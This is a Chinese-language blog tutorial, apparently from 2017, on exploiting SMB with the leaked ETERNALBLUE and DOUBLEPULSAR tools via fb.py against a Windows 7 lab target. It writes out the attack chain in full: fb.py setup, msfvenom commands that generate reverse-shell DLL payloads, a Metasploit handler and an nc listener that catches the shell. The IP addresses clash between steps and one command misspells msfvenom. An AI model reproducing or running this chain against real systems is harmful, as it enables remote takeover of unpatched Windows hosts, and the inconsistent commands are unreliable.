[关闭]
@websec007 2017-04-19T15:10:26.000000Z 字数 2528 阅读 4274

方程式工具箱之SMB漏洞利用

副标题:fb.py脚本之ETERNALBLUE & Doublepulsar 插件使用

工具收集

SMB 漏洞利用过程小结

1、验证SMB 445端口是否开放
2、验证SMB 漏洞
3、shell反弹成功

一、测试环境准备

1. 攻击机两台(win2003 & kali)

2. 被攻击主机一台(win7)

3. fb.py环境配置

3.1. python运行环境

3.2 fb.py环境包部署

二、攻击演示

2.1 配置eternalblue攻击条件

(1) 运行fb.py脚本

  1. > cd c:\python\windows\
  2. > python fb.py

Markdown
Markdown

(2) 设定攻击目标参数

Markdown

(3) 调用Eternalblue攻击插件

Markdown
Markdown

(4) 执行攻击插件

Markdown

(5) 调用doublepulsar查询

Markdown

(6) 设定插件doublepulsar攻击参数

指定攻击载荷位置: c:\shell.dll
选择攻击目标主机架构:x64

  1. DLLPaload : c:\shell.dll
  2. Architecture: x64

Markdown
Markdown
Markdown

2.2 使用msfvenom生成反弹攻击载荷(payload)

(1) msfvenom生产shell反弹攻击载荷

  1. > msfvenom -p windows/x64/reverse_tcp LHOST=192.168.31.100 LPORT=12345 -f dll >win.dll

(2) 复制win.dll到攻击机10.48.31.100

将win.dll恶意程序复制到攻击主机 10.48.31.100 C:\根目录下。

2.3 使用msf框架接收shell反弹

在msf下开启msfpaylod监听,接收shell反弹:

  1. use exploit/multi/handler
  2. set lhost 192.168.1.106
  3. set lport 5555
  4. set PAYLOAD windows/x64/meterpreter/reverse_tcp
  5. exploit

三、使用nc接收 reverse_shell_tcp 的反弹shell

3.1 生成自带shell的反弹恶意程序shell.dll

使用kali自带的msf框架,查找到shell_reverse_tcp的payload路径,然后使用msfvenom生成一个自带shell的恶意反弹程序。

(1) 查找shell_reverse_tcp payload路径

  1. \> msfconsole
  2. \> search shell_reverse_tcp

获取到 x64位的payload路径:payload/windows/x64/shell_reverse_tcp

Markdown

(2) 使用msfvenom 生成自带shell的反弹恶意程序 shell.dll

  1. msfvencom -p payload/windows/x64/shell_reverse_tcp LHOST=192.168.31.100 LPORT=12345 -f dll >shell.dll

Markdown

3.2 使用nc打开一个本地监听

(1)使用 nc -lvvp 12345打开本地监听

  1. \> nc -lvvp 12345

Markdown

(2) 调用攻击插件eternalblue

(3) 成功接收到shell.dll的反弹shell

Markdown

参考文档:

1. 方程式ETERNALBLUE 之fb.py的复现
2. Windows漏洞实战,盲打女寝
3.i春秋视频演示与实验环境

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注